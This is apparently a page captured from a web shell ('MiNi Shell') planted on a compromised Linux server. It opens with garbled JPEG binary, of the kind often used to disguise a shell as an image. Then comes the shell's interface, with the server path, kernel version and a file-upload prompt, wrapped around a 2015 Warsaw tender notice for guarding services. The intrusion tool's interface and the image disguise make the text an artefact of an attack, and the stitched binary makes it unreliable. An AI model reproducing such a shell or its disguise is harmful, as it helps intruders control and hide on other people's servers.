JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151126/321096-N-2015.html

<p class="kh_header"><b>Warszawa: Usługa ochrony terenów i obiektów znajdujących się w Dzielnicy Śródmieście w Warszawie administrowanych przez ZTP</b><br>
<b>Numer ogłoszenia: 321096 - 2015; data zamieszczenia: 26.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów  Publicznych , ul. Podwale 23, 00-261 Warszawa, woj. mazowieckie, tel. 22 27 70500, faks 22 27 70503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ztp.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony terenów i obiektów znajdujących się w Dzielnicy Śródmieście w Warszawie administrowanych przez ZTP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia składa się z 2 części i obejmuje:
1)usługę ochrony Pasażu Handlowego Hale Mirowskie zlokalizowanego w Warszawie przy ul. Pl. Mirowski 1 oraz Parku Mirowskiego (część 1),
2)usługę ochrony budynku usytuowanego w Warszawie przy ulicy Podwale 23 (część 2).
2.Zamawiający dopuszcza składanie ofert częściowych. Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części.
3.Szczegółowy zakres przedmiotu zamówienia dla części 1, 2 określają:
1) Nazwa i kod CPV
  79710000-4 usługi ochroniarskie 
2)Plan Pasażu Handlowego Hale Mirowskie - załącznik nr 9,
3) Szczegółowy opis przedmiotu zamówienia Pasażu Handlowego Hale Mirowskie (część 1) - załącznik nr 10,
4)Szczegółowy opis przedmiotu zamówienia budynku przy usytuowanego w Warszawie przy ulicy Podwale 23 (część 2) - załącznik nr 11,
5)Wzór umowy dla części 1, 2 stanowiący załączniki nr 8a (część 1) i 8b (część 2) do SIWZ.
4.Plan budynku usytuowanego w Warszawie przy ulicy Podwale 23 dostępny jest do wglądu w siedzibie Zamawiającego.
Uwagi dotyczące przedmiotu zamówienia:
Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium na okres związania ofertą w wysokości: 7 000 zł (słownie: siedem tysięcy złotych) - dla części 1 zamówienia i  2.000 zł (słownie: dwa tysiące złotych) - dla części 2 zamówienia.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania        
Opis sposobu dokonywania oceny spełniania tego warunku  
Zamawiający uzna, że Wykonawca spełnia warunki udziału w postępowaniu, gdy Wykonawca w ramach:
posiadania uprawnienia wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania:
 posiada koncesję - zgodnie z ustawą z dnia 22.08.1997 r. o ochronie osób  i mienia (Dz. U. z 2014, poz. 1099) na prowadzenie działalności gospodarczej     w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej, wydanej przez Ministerstwo Spraw Wewnętrznych i Administracji - dotyczy części 1 i 2 zamówienia;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach posiadania wiedzy i doświadczenia 
-(dotyczy części 1 zamówienia) wykonał w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej (3) trzy usługi odpowiadające swoim rodzajem przedmiotowi zamówienia tj.: usługę ochrony świadczoną przez min. 6 miesięcy o wartości min. 150.000 zł  brutto każda, w tym:
- min. 1 usługę ochrony targowiska lub giełdy owocowo - warzywnej lub kwiatowej lub samochodowej oraz 
- min. 2 usługi polegające na ochronie obiektów (usługowych i/lub handlowych i/lub magazynowych i/lub biurowych), 
oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 5a do SIWZ,
- (dotyczy części 2 zamówienia) wykonał w okresie ostatnich (3) trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia tj.: usługę ochrony o wartości min. 50.000 zł brutto
oraz załączy dowody potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie, zgodnie z załącznikiem nr 5b do SIWZ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w  ramach dysponowania potencjałem technicznym:
-  Dla części 1 zamówienia dysponuje:
                          -      jednolitym umundurowaniem dla pracowników ochrony; 
       -   środkami łączności - min. 7 szt. telefonów komórkowych lub min. 2 szt.  telefonów komórkowych wraz z min. 5 szt. radiostacji przenośnych (radiotelefonów). 
Dysponowanie narzędziami należy wykazać wg wzoru, który stanowi załącznik nr 6a do SIWZ. 
- Dla części 2 zamówienia dysponuje:
-   jednolitym umundurowaniem dla pracowników ochrony; 
-   środkami łączności - min. 2 szt. telefonów komórkowych 
Dysponowanie narzędziami należy wykazać wg wzoru, który stanowi załącznik nr 6b do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach wykazania się sytuacją ekonomiczną i finansową 
-osiągnął w okresie ostatnich trzech lat obrotowych  a  jeżeli okres prowadzenia działalności jest krótszy - za ten okres,  przychód ze sprzedaży produktów (dla Wykonawców prowadzących pełną księgowość) lub przychód z działalności, (dla Wykonawców niezobowiązanych do sporządzania bilansu) minimum  łącznie w w/w okresie 800 000 zł według załączonego wzoru, który stanowi załącznik 7 do SIWZ (dotyczy części 1 zamówienia);
- osiągnął w okresie ostatnich trzech lat obrotowych  a  jeżeli okres prowadzenia działalności jest krótszy - za ten okres,  przychód ze sprzedaży produktów (dla Wykonawców prowadzących pełną księgowość) lub przychód z działalności, (dla Wykonawców niezobowiązanych do sporządzania bilansu) minimum  łącznie w w/w okresie 200 000 zł według załączonego wzoru, który stanowi załącznik 7 do SIWZ (dotyczy części 2 zamówienia);
-  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 2 000 000 zł (dotyczy części 1 zamówienia);
-  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 1 125 000 zł  (dotyczy części 2 zamówienia);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty (Formularz ofertowy musi być zgodny w treści ze wzorem formularza ofertowego stanowiącego załącznik nr 1 do SIWZ), muszą być załączone: 
1.	Potwierdzenie wniesienia wadium wg wymagań określonych w pkt. 21 - 25 SIWZ;
2.	Pełnomocnictwo określające jego zakres i udzielone (podpisane) przez osoby uprawnione do reprezentacji Wykonawcy - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik;
3.	Pełnomocnictwo do reprezentacji w postępowaniu albo reprezentowanie 
w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego - 
w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia; 
4.	Zobowiązanie do udostępnienia zasobów niezbędnych do wykonania zamówienia w przypadku gdy wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych podmiotów  określonych w pkt 10.5 i 10.6 SIWZ. 
5.	Wszystkie dokumenty i oświadczenia wymienione w pkt 10 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Doświadczenie Wykonawcy - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
 aukcje.um.warszawa.pl</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w zakresie określonym we wzorze umowy załącznik 8a (część 1 zamówienia) w § 2 ust. 7 i w § 6 ust. 5 i załącznik 8b (część 2 zamówienia) w § 7 ust. 7 tj. Zamawiający zastrzega sobie możliwość zmiany ilości dni, godzin pracy oraz obsady osobowej określonych w ust. 1, w zależności od bieżących potrzeb, Zamawiający dopuszcza możliwość zmiany umowy w zakresie wskazanym w ust. 1 pkt. 1 i 2 w przypadku zmiany stawki podatku VAT. Kwota wynagrodzenia brutto, określona     w pkt. 3 nie ulega w takim przypadku zmianie, Zamawiający dopuszcza możliwość zmiany umowy w zakresie wskazanym w ust. 1 pkt. 1 i 2 w przypadku zmiany stawki podatku VAT. Kwota wynagrodzenia brutto, określona  w pkt. 3 nie ulega w takim przypadku zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztp.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Podwale 23, 00-261 Warszawa, pok 9 (parter) cena formularza 20 zł. Kwotę należy wpłacić : ZTP Bank Handlowy w Warszawie S.A. Nr 88103015080000000550890003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 10:00, miejsce: Warszawa, ul. Podwale 23; Kancelaria ZTP, parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługa ochrony Pasażu Handlowego Hale Mirowskie zlokalizowanego w Warszawie przy ul. Pl. Mirowski 1 oraz Parku Mirowskiego (część 1),.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia składa się z 2 części i obejmuje:
1)	  usługę ochrony Pasażu Handlowego Hale Mirowskie zlokalizowanego w Warszawie przy ul. Pl. Mirowski 1 oraz Parku Mirowskiego (część 1),
2)	  usługę ochrony budynku usytuowanego w Warszawie przy ulicy Podwale 23 (część 2).
2.	Zamawiający dopuszcza składanie ofert częściowych. Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części.
3.	Szczegółowy zakres przedmiotu zamówienia dla części 1, 2 określają:
1)	  Nazwa i kod CPV
      79710000-4 usługi ochroniarskie 
2)	  Plan Pasażu Handlowego Hale Mirowskie - załącznik nr 9,
3)	  Szczegółowy opis przedmiotu zamówienia Pasażu Handlowego Hale Mirowskie (część 1) - załącznik nr 10,
4)	  Szczegółowy opis przedmiotu zamówienia budynku przy usytuowanego w Warszawie przy ulicy Podwale 23 (część 2) - załącznik nr 11,
5)	  Wzór umowy dla części 1, 2 stanowiący załączniki nr 8a (część 1) i 8b (część 2) do SIWZ.
4.	Plan budynku usytuowanego w Warszawie przy ulicy Podwale 23 dostępny jest do wglądu w siedzibie Zamawiającego.
Uwagi dotyczące przedmiotu zamówienia:
Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Doświadczenie Wykonawcy - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługa ochrony budynku usytuowanego w Warszawie przy ulicy Podwale 23 
(część 2)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia składa się z 2 części i obejmuje:
1)	  usługę ochrony Pasażu Handlowego Hale Mirowskie zlokalizowanego w Warszawie przy ul. Pl. Mirowski 1 oraz Parku Mirowskiego (część 1),
2)	  usługę ochrony budynku usytuowanego w Warszawie przy ulicy Podwale 23 (część 2).
2.	Zamawiający dopuszcza składanie ofert częściowych. Zamawiający dopuszcza złożenie oferty przez Wykonawcę do jednej lub do wielu części.
3.	Szczegółowy zakres przedmiotu zamówienia dla części 1, 2 określają:
1)	  Nazwa i kod CPV
      79710000-4 usługi ochroniarskie 
2)	  Plan Pasażu Handlowego Hale Mirowskie - załącznik nr 9,
3)	  Szczegółowy opis przedmiotu zamówienia Pasażu Handlowego Hale Mirowskie (część 1) - załącznik nr 10,
4)	  Szczegółowy opis przedmiotu zamówienia budynku przy usytuowanego w Warszawie przy ulicy Podwale 23 (część 2) - załącznik nr 11,
5)	  Wzór umowy dla części 1, 2 stanowiący załączniki nr 8a (część 1) i 8b (część 2) do SIWZ.
4.	Plan budynku usytuowanego w Warszawie przy ulicy Podwale 23 dostępny jest do wglądu w siedzibie Zamawiającego.
Uwagi dotyczące przedmiotu zamówienia:
Zaleca się Wykonawcom zapoznanie się z warunkami lokalnymi, w których będzie realizowany przedmiot zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Doświadczenie Wykonawcy - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com